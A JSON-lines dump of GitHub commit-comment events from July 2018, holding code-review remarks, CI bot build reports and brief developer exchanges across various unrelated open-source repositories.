{"id":"7925907200","type":"CommitCommentEvent","actor":{"login":"matthijsmelissen"},"repo":{"name":"matthijsmelissen/qif-converter"},"payload":{"comment":{"id":29614677,"position":63,"line":138,"path":"script.js","commit_id":"1684b13a4b1392e491e929afd70e0d41310830c0","created_at":"2018-07-05T22:38:46Z","updated_at":"2018-07-05T22:38:46Z","author_association":"OWNER","body":"Thanks, fixed!"}},"created_at":"2018-07-05T22:38:46Z"}
{"id":"7925907796","type":"CommitCommentEvent","actor":{"login":"NickCraver"},"repo":{"name":"StackExchange/StackExchange.Redis"},"payload":{"comment":{"id":29614679,"position":null,"line":null,"path":null,"commit_id":"b73d231b57adca558f557b7d4b0cc739cd68d9ea","created_at":"2018-07-05T22:38:59Z","updated_at":"2018-07-05T22:38:59Z","author_association":"MEMBER","body":"Probably meant `pipelines` branch directly here - you ready to merge over anyhow?"}},"created_at":"2018-07-05T22:38:59Z"}
{"id":"7925909975","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614683,"position":19,"line":28,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:39:44Z","updated_at":"2018-07-05T22:39:44Z","author_association":"COLLABORATOR","body":"```javascript\r\nlist.map( (item, index) => {\r\n// do something with index here\r\n}\r\n```\r\nbecause you're using `map` you get free painless access to the index of every item in the list. That's why it's \"meta\".\r\nIf you had a java array list, would need to add the index to every element in your model? You wouldn't because, if you wanted to know the index you'd say\r\n```java\r\nfor(int i = 0; i < list.size; i ++) {\r\n  System.out.printLn(list.get(i), i);\r\n}\r\n```"}},"created_at":"2018-07-05T22:39:44Z"}
{"id":"7925911345","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614686,"position":71,"line":76,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:40:11Z","updated_at":"2018-07-05T22:40:11Z","author_association":"COLLABORATOR","body":"this is what i mean @ImenBenA "}},"created_at":"2018-07-05T22:40:11Z"}
{"id":"7925913408","type":"CommitCommentEvent","actor":{"login":"rasple"},"repo":{"name":"rasple/sw-eng-jfx"},"payload":{"comment":{"id":29614689,"position":null,"line":null,"path":null,"commit_id":"159bb5f844f290d48c150e1fd2564041b8d93820","created_at":"2018-07-05T22:40:53Z","updated_at":"2018-07-05T22:40:53Z","author_association":"OWNER","body":"Miems sind hier verboten"}},"created_at":"2018-07-05T22:40:53Z"}
{"id":"7925913922","type":"CommitCommentEvent","actor":{"login":"NorbiPeti"},"repo":{"name":"NorbiPeti/VirtualComputer"},"payload":{"comment":{"id":29614690,"position":null,"line":null,"path":null,"commit_id":"f933d417b7ffa6278b48c2a42d8378808e1610f9","created_at":"2018-07-05T22:41:03Z","updated_at":"2018-07-05T22:41:03Z","author_association":"OWNER","body":"https://googleprojectzero.blogspot.com/2017/08/bypassing-virtualbox-process-hardening.html"}},"created_at":"2018-07-05T22:41:03Z"}
{"id":"7925922202","type":"CommitCommentEvent","actor":{"login":"Arthur76sammy"},"repo":{"name":"inzva/DOH"},"payload":{"comment":{"id":29614711,"position":25,"line":124,"path":"dist/build/autogen/cabal_macros.h","commit_id":"7115c610d3f8a59f294bb3b26acc4395eba8d463","created_at":"2018-07-05T22:43:51Z","updated_at":"2018-07-05T22:43:51Z","author_association":"NONE","body":"w"}},"created_at":"2018-07-05T22:43:51Z"}
{"id":"7925923697","type":"CommitCommentEvent","actor":{"login":"mgravell"},"repo":{"name":"StackExchange/StackExchange.Redis"},"payload":{"comment":{"id":29614713,"position":null,"line":null,"path":null,"commit_id":"b73d231b57adca558f557b7d4b0cc739cd68d9ea","created_at":"2018-07-05T22:44:22Z","updated_at":"2018-07-05T22:44:22Z","author_association":"CONTRIBUTOR","body":"@NickCraver  yeah, I noticed that so I cherry-picked it over"}},"created_at":"2018-07-05T22:44:22Z"}
{"id":"7925923758","type":"CommitCommentEvent","actor":{"login":"AlessandroMiola"},"repo":{"name":"AlessandroMiola/BitcoinBlockchainTechnology"},"payload":{"comment":{"id":29614714,"position":null,"line":null,"path":null,"commit_id":"c39f811f1ea9168eaa288cec9bd7e54372ddfd10","created_at":"2018-07-05T22:44:24Z","updated_at":"2018-07-05T22:44:24Z","author_association":"OWNER","body":"- Module for encoding of just a coordinate (instead of the whole point) needed within elliptic curve modules?  (I'm referring to line 22 in coercehashtopoint). Could it make sense? "}},"created_at":"2018-07-05T22:44:24Z"}
{"id":"7925925640","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614719,"position":7,"line":14,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:45:01Z","updated_at":"2018-07-05T22:45:01Z","author_association":"COLLABORATOR","body":"And you don't need to save the index in the state."}},"created_at":"2018-07-05T22:45:01Z"}
{"id":"7925925859","type":"CommitCommentEvent","actor":{"login":"ImenBenA"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614721,"position":19,"line":28,"path":"src/index.js","commit_id":"7a5eb4b36182afacc99df1d66edfeb57139f66d1","created_at":"2018-07-05T22:45:06Z","updated_at":"2018-07-05T22:45:06Z","author_association":"OWNER","body":"Right ! This helps A LOT ! Thanks again everything works fine now thanks to your help.\r\nLet me just walk through my code, reformat and then push :D"}},"created_at":"2018-07-05T22:45:06Z"}
{"id":"7925929360","type":"CommitCommentEvent","actor":{"login":"harold"},"repo":{"name":"xeqi/peridot"},"payload":{"comment":{"id":29614728,"position":null,"line":null,"path":null,"commit_id":"e878e44844639d4e3106c2e81098ff6d6e687a04","created_at":"2018-07-05T22:46:13Z","updated_at":"2018-07-05T22:46:13Z","author_association":"NONE","body":"Thanks for this lib, if it didn't exist, we'd need to start by building something just like it. Really appreciate it."}},"created_at":"2018-07-05T22:46:13Z"}
{"id":"7925929790","type":"CommitCommentEvent","actor":{"login":"winzig"},"repo":{"name":"filestack/filestack-js"},"payload":{"comment":{"id":29614729,"position":null,"line":null,"path":null,"commit_id":"14556324112bff1625912720e9240b18a98461b0","created_at":"2018-07-05T22:46:21Z","updated_at":"2018-07-05T22:46:21Z","author_association":"NONE","body":"@velveteer Do you think these changes would resolve the `Unexpected token 'const'` errors we had been seeing generated by creditor the last few days in Sentry?"}},"created_at":"2018-07-05T22:46:21Z"}
{"id":"7925941602","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29614745,"position":null,"line":null,"path":null,"commit_id":"bfb5e7670bf35b0559472163134c37a5363468bd","created_at":"2018-07-05T22:49:21Z","updated_at":"2018-07-05T22:49:21Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-MacOS-10.9-clang: OK (2931 of 2932 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T22:49:21Z"}
{"id":"7925941797","type":"CommitCommentEvent","actor":{"login":"lidel"},"repo":{"name":"ghostery/ghostery-extension"},"payload":{"comment":{"id":29614746,"position":25,"line":199,"path":"src/classes/PolicySmartBlock.js","commit_id":"5323f083cc52b2cf4695e9acbc5ac51ead40ad69","created_at":"2018-07-05T22:49:24Z","updated_at":"2018-07-05T22:49:24Z","author_association":"NONE","body":"Worth including v6 version as well:\r\n\r\n```diff\r\n-\t\tif (requestHost === 'localhost' || requestHost === '127.0.0.1') {\r\n+\t\tif (requestHost === 'localhost' || requestHost === '127.0.0.1' || requestHost === '[::1]') {\r\n```"}},"created_at":"2018-07-05T22:49:24Z"}
{"id":"7925943917","type":"CommitCommentEvent","actor":{"login":"XenHat"},"repo":{"name":"passionate-coder/Classic-Start"},"payload":{"comment":{"id":29614752,"position":null,"line":null,"path":null,"commit_id":"b34d0910283250ed0d20f4a6e2e8a6ac5f90ea55","created_at":"2018-07-05T22:49:53Z","updated_at":"2018-07-05T22:49:53Z","author_association":"MEMBER","body":"Wow! Very good. An unfortunate consequence of using non-safe code, I suppose.\r\nI was using the latest insider preview, but my installation self-destructed today. I will not be able to test this fix, but as long as we don't get reports of it breaking horribly, let's bag it."}},"created_at":"2018-07-05T22:49:53Z"}
{"id":"7925944760","type":"CommitCommentEvent","actor":{"login":"alama"},"repo":{"name":"Arks-Layer/PSO2ENPatchCSV"},"payload":{"comment":{"id":29614753,"position":397,"line":1400,"path":"Dialogue/apc_chat.csv","commit_id":"020f4dd8baf2f5cf1b79760ee8be314f06407c97","created_at":"2018-07-05T22:50:04Z","updated_at":"2018-07-05T22:50:04Z","author_association":"CONTRIBUTOR","body":"Should this\r\n`EnemyBoost#21,\"\"\"Es un poco diferente, ¿No?\"\"\"`\r\n"}},"created_at":"2018-07-05T22:50:04Z"}
{"id":"7925952645","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29614764,"position":null,"line":null,"path":null,"commit_id":"6a075867b02f7d6f4f077a6733032347cd547cdf","created_at":"2018-07-05T22:52:26Z","updated_at":"2018-07-05T22:52:26Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2969 of 2970 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T22:52:26Z"}
{"id":"7925954409","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.app.contenttypes"},"payload":{"comment":{"id":29614769,"position":null,"line":null,"path":null,"commit_id":"184ebd4616a0cf5fecf19e8a128a4cf49594a890","created_at":"2018-07-05T22:53:02Z","updated_at":"2018-07-05T22:53:02Z","author_association":"NONE","body":"Markus Hilbert your emails are not known to GitHub and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2018-07-05T22:53:02Z"}
{"id":"7925955365","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/ruamel_yaml-feedstock"},"payload":{"comment":{"id":29614771,"position":null,"line":null,"path":null,"commit_id":"703918bff977dddeee96a113b30536cf4b0a157c","created_at":"2018-07-05T22:53:21Z","updated_at":"2018-07-05T22:53:21Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mbargull were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-05T22:53:21Z"}
{"id":"7925959114","type":"CommitCommentEvent","actor":{"login":"cameronc137"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29614783,"position":null,"line":null,"path":null,"commit_id":"f1762734561967e689b1dfbea99971731c2d833f","created_at":"2018-07-05T22:54:40Z","updated_at":"2018-07-05T22:54:40Z","author_association":"CONTRIBUTOR","body":"Ok. I just tried this macro, but it still isn't registering optical photon hits, even with the proper efficiency and SensDet=opticalphoton being set in there. Did I miss something?"}},"created_at":"2018-07-05T22:54:40Z"}
{"id":"7925959383","type":"CommitCommentEvent","actor":{"login":"walbourn"},"repo":{"name":"Microsoft/DirectXTex"},"payload":{"comment":{"id":29614784,"position":5,"line":10,"path":"DirectXTex/Shaders/BC7Encode.hlsl","commit_id":"fcc5b33bf35b6b7aef73bc06eb0dcaab0ccd8668","created_at":"2018-07-05T22:54:46Z","updated_at":"2018-07-05T22:54:46Z","author_association":"MEMBER","body":"Same thing as [this commit](https://github.com/Microsoft/DirectXTex/commit/9da4aec77a5d8320ff6b3c1c76bc0e982f56915b#diff-093aacc3e98eaa098173a3253202a821)"}},"created_at":"2018-07-05T22:54:46Z"}
{"id":"7925960186","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29614786,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-05T22:55:03Z","updated_at":"2018-07-05T22:55:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T22:55:03Z"}
{"id":"7925967840","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29614805,"position":null,"line":null,"path":null,"commit_id":"6a075867b02f7d6f4f077a6733032347cd547cdf","created_at":"2018-07-05T22:57:38Z","updated_at":"2018-07-05T22:57:38Z","author_association":"NONE","body":"remove-curve-type (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6a075867b02f7d6f4f077a6733032347cd547cdf-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-05T22:57:38Z"}
{"id":"7925970068","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614811,"position":null,"line":null,"path":null,"commit_id":"ef7813825063ca8ccf5a1b67357d56a9350ad113","created_at":"2018-07-05T22:58:22Z","updated_at":"2018-07-05T22:58:22Z","author_association":"COLLABORATOR","body":"💯 "}},"created_at":"2018-07-05T22:58:22Z"}
{"id":"7925971851","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"w1th0utnam3/minidolfin"},"payload":{"comment":{"id":29614815,"position":130,"line":173,"path":"minidolfin/assembling.py","commit_id":"5c962fc699fb648e1b7d9f58523ba48f7e7f190c","created_at":"2018-07-05T22:58:58Z","updated_at":"2018-07-05T22:58:58Z","author_association":"NONE","body":"dividable -> divisible"}},"created_at":"2018-07-05T22:58:58Z"}
{"id":"7925972063","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"w1th0utnam3/minidolfin"},"payload":{"comment":{"id":29614816,"position":131,"line":174,"path":"minidolfin/assembling.py","commit_id":"5c962fc699fb648e1b7d9f58523ba48f7e7f190c","created_at":"2018-07-05T22:59:04Z","updated_at":"2018-07-05T22:59:04Z","author_association":"NONE","body":"same here"}},"created_at":"2018-07-05T22:59:04Z"}
{"id":"7925972800","type":"CommitCommentEvent","actor":{"login":"ImenBenA"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29614820,"position":null,"line":null,"path":null,"commit_id":"ef7813825063ca8ccf5a1b67357d56a9350ad113","created_at":"2018-07-05T22:59:19Z","updated_at":"2018-07-05T22:59:19Z","author_association":"OWNER","body":"😃 "}},"created_at":"2018-07-05T22:59:19Z"}
{"id":"7925982371","type":"CommitCommentEvent","actor":{"login":"sarahg"},"repo":{"name":"sarahg/borked"},"payload":{"comment":{"id":29614851,"position":null,"line":null,"path":null,"commit_id":"301796a8dfe62e5bbbf9876b2aecc308a2e094a6","created_at":"2018-07-05T23:02:32Z","updated_at":"2018-07-05T23:02:32Z","author_association":"OWNER","body":"Created multidev environment [borked#pr-4](https://dashboard.pantheon.io/sites/8f2545fd-8ec0-4689-8fab-e0e8bb485e35#pr-4).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-4-borked.pantheonsite.io/)"}},"created_at":"2018-07-05T23:02:32Z"}
{"id":"7925985929","type":"CommitCommentEvent","actor":{"login":"datafl4sh"},"repo":{"name":"datafl4sh/diskpp"},"payload":{"comment":{"id":29614857,"position":null,"line":null,"path":null,"commit_id":"1af1941b3d03943f85e811dc53c7503af191e215","created_at":"2018-07-05T23:03:40Z","updated_at":"2018-07-05T23:03:40Z","author_association":"OWNER","body":"Breaks integration on triangles and tetrahedra. Fixed in 641ceac."}},"created_at":"2018-07-05T23:03:40Z"}
{"id":"7925989380","type":"CommitCommentEvent","actor":{"login":"Swaildeaf"},"repo":{"name":"swarco/swarco-linux-v3"},"payload":{"comment":{"id":29614865,"position":null,"line":null,"path":null,"commit_id":"7263ad4b72e503df782781ad77bbf6d77ecff7e3","created_at":"2018-07-05T23:04:45Z","updated_at":"2018-07-05T23:04:45Z","author_association":"NONE","body":"What is IP adress ?"}},"created_at":"2018-07-05T23:04:45Z"}
{"id":"7925993869","type":"CommitCommentEvent","actor":{"login":"wdconinc"},"repo":{"name":"JeffersonLab/remoll"},"payload":{"comment":{"id":29614882,"position":null,"line":null,"path":null,"commit_id":"f1762734561967e689b1dfbea99971731c2d833f","created_at":"2018-07-05T23:06:12Z","updated_at":"2018-07-05T23:06:12Z","author_association":"MEMBER","body":"So, `build/remoll macros/optical.mac` does not store any optical photons on a clean develop branch?\r\n"}},"created_at":"2018-07-05T23:06:12Z"}
{"id":"7925994092","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614883,"position":17,"line":18,"path":"ticketing/views/ZioneDb.py","commit_id":"575d424a69093057865a6d21878fb581a95c467f","created_at":"2018-07-05T23:06:16Z","updated_at":"2018-07-05T23:06:16Z","author_association":"COLLABORATOR","body":"to help make your life easier, there is a python inbuilt function that can do this for you\r\nhttp://www.pythonforbeginners.com/data-types/python-join-examples\r\n\r\nwhat you can do is instead of this for loop, you can do the following:\r\nfiller = ', '\r\ncolumns = filler.join(list_col) #columns now is a single string that concatenated all the column strings into one where each column is separated by ', '"}},"created_at":"2018-07-05T23:06:16Z"}
{"id":"7925997443","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614892,"position":17,"line":18,"path":"ticketing/views/ZioneDb.py","commit_id":"575d424a69093057865a6d21878fb581a95c467f","created_at":"2018-07-05T23:07:30Z","updated_at":"2018-07-05T23:07:30Z","author_association":"COLLABORATOR","body":"i also recommend making a helper function at the very to do this joining task for you:\r\nex.\r\ndef join_columns(list_col):\r\n    filler = ', '\r\n    return filler.join(list_col)\r\n\r\nand you can call this helper function everywhere else you do something similar\r\n"}},"created_at":"2018-07-05T23:07:30Z"}
{"id":"7925998185","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614894,"position":43,"line":42,"path":"ticketing/views/ZioneDb.py","commit_id":"575d424a69093057865a6d21878fb581a95c467f","created_at":"2018-07-05T23:07:45Z","updated_at":"2018-07-05T23:07:45Z","author_association":"COLLABORATOR","body":"look at above"}},"created_at":"2018-07-05T23:07:45Z"}
{"id":"7926000363","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614899,"position":73,"line":69,"path":"ticketing/views/ZioneDb.py","commit_id":"575d424a69093057865a6d21878fb581a95c467f","created_at":"2018-07-05T23:08:32Z","updated_at":"2018-07-05T23:08:32Z","author_association":"COLLABORATOR","body":"see above"}},"created_at":"2018-07-05T23:08:32Z"}
{"id":"7926001032","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614900,"position":106,"line":102,"path":"ticketing/views/ZioneDb.py","commit_id":"575d424a69093057865a6d21878fb581a95c467f","created_at":"2018-07-05T23:08:44Z","updated_at":"2018-07-05T23:08:44Z","author_association":"COLLABORATOR","body":"see above"}},"created_at":"2018-07-05T23:08:44Z"}
{"id":"7926005767","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614906,"position":null,"line":null,"path":null,"commit_id":"575d424a69093057865a6d21878fb581a95c467f","created_at":"2018-07-05T23:10:28Z","updated_at":"2018-07-05T23:10:28Z","author_association":"COLLABORATOR","body":"make sure you combine all your commits into one commit instead of making several small commits\r\nyou can do this by first, creating a new commit (this will be the commit you eventually push to your branch/master)\r\neverytime you make a change, call git commit --amend (this will change the currnet commit youre on to include your new changes into it)\r\nand then when you are finally satisfied with your changes, you can push (push only when youre completely done ammending all your code changes at once)"}},"created_at":"2018-07-05T23:10:28Z"}
{"id":"7926009804","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614917,"position":19,"line":9,"path":"ticketing/views/TicketDb.py","commit_id":"77a743ac9aa9b557fedb3fce354fbbfb7209b750","created_at":"2018-07-05T23:12:00Z","updated_at":"2018-07-05T23:12:00Z","author_association":"COLLABORATOR","body":"you can combine lines 9 and 10 into one line for clarity:\r\nlist_col = ['TicketID']"}},"created_at":"2018-07-05T23:12:00Z"}
{"id":"7926010873","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614919,"position":31,"line":21,"path":"ticketing/views/TicketDb.py","commit_id":"77a743ac9aa9b557fedb3fce354fbbfb7209b750","created_at":"2018-07-05T23:12:21Z","updated_at":"2018-07-05T23:12:21Z","author_association":"COLLABORATOR","body":"see above to merge your 4 lines into 2 lines of code"}},"created_at":"2018-07-05T23:12:21Z"}
{"id":"7926012861","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29614922,"position":23,"line":34,"path":"contracts/Splitter.sol","commit_id":"a05c7c2503288544a266209c124141c8ddc823c9","created_at":"2018-07-05T23:13:04Z","updated_at":"2018-07-05T23:13:04Z","author_association":"NONE","body":"Or ... \r\n```\r\nuint half = msg.value.div(2);\r\nuint remainder = msg.value % 2;\r\n\r\nif(remainder == 1) balances[msg.sender) += 1;\r\n```"}},"created_at":"2018-07-05T23:13:04Z"}
{"id":"7926013470","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29614924,"position":null,"line":null,"path":null,"commit_id":"ec83054acaf0abce6fc177567d3d85947f3833e2","created_at":"2018-07-05T23:13:17Z","updated_at":"2018-07-05T23:13:17Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2927 of 2930 tests passed, 13 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 5 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: Table big diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec83054acaf0abce6fc177567d3d85947f3833e2-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-05T23:13:17Z"}
{"id":"7926015136","type":"CommitCommentEvent","actor":{"login":"YohDeadfall"},"repo":{"name":"npgsql/npgsql"},"payload":{"comment":{"id":29614932,"position":null,"line":null,"path":null,"commit_id":"7f49d3b27f982bfc1c9ca9dfb544e875d4eff459","created_at":"2018-07-05T23:13:55Z","updated_at":"2018-07-05T23:13:55Z","author_association":"MEMBER","body":"Travis CI failed again, @roji. What's wrong with it?"}},"created_at":"2018-07-05T23:13:55Z"}
{"id":"7926015987","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29614935,"position":23,"line":34,"path":"contracts/Splitter.sol","commit_id":"a05c7c2503288544a266209c124141c8ddc823c9","created_at":"2018-07-05T23:14:14Z","updated_at":"2018-07-05T23:14:14Z","author_association":"NONE","body":"The conditional is to avoid an unnecessary write to save gas if there is nothing to do. "}},"created_at":"2018-07-05T23:14:14Z"}
{"id":"7926018530","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614940,"position":42,"line":13,"path":"ticketing/views/Dashboard.py","commit_id":"044111d774e0619c87efd1d51e272054a7235a91","created_at":"2018-07-05T23:15:11Z","updated_at":"2018-07-05T23:15:11Z","author_association":"COLLABORATOR","body":"change the name from list1 to user_data"}},"created_at":"2018-07-05T23:15:11Z"}
{"id":"7926019944","type":"CommitCommentEvent","actor":{"login":"arefin070"},"repo":{"name":"arefin070/Educational-Web-App-Francia-"},"payload":{"comment":{"id":29614946,"position":4,"line":13,"path":"courses.php","commit_id":"019b3322c3acf9c03167c4da83991ae857a76b67","created_at":"2018-07-05T23:15:42Z","updated_at":"2018-07-05T23:15:42Z","author_association":"OWNER","body":"Its okay"}},"created_at":"2018-07-05T23:15:42Z"}
{"id":"7926024010","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"NateWickstrom/splitter-solidity"},"payload":{"comment":{"id":29614953,"position":31,"line":40,"path":"contracts/Splitter.sol","commit_id":"a05c7c2503288544a266209c124141c8ddc823c9","created_at":"2018-07-05T23:17:15Z","updated_at":"2018-07-05T23:17:15Z","author_association":"NONE","body":"Try to make it so this is a replay log that chronicles in the inputs such that the state history could be reconstructed by observers. Generally, one event per transaction with the important inputs. More like\r\n```\r\nLogSplitFunds(msg.sender, receiver1, receiver2, uint amount); // where the halves of the amount and return of the change is self-evident from the original input. \r\n```"}},"created_at":"2018-07-05T23:17:15Z"}
{"id":"7926024034","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29614954,"position":22,"line":12,"path":"ticketing/views/UserStore.py","commit_id":"a318bc2bf3937ec2827f17a8ef28177c9d5d4da0","created_at":"2018-07-05T23:17:15Z","updated_at":"2018-07-05T23:17:15Z","author_association":"COLLABORATOR","body":"where is the variable user defined?\r\nshouldnt you be passing in the string 'users' to indicate this should read from the users table?"}},"created_at":"2018-07-05T23:17:15Z"}
{"id":"7926024200","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"w1th0utnam3/minidolfin"},"payload":{"comment":{"id":29614956,"position":5,"line":21,"path":"setup.py","commit_id":"1cf6086d933ca93f4a36be44b6321fd300f3757f","created_at":"2018-07-05T23:17:19Z","updated_at":"2018-07-05T23:17:19Z","author_association":"NONE","body":"I am confused by this. Does it work with FFC-old or FFCx?"}},"created_at":"2018-07-05T23:17:19Z"}
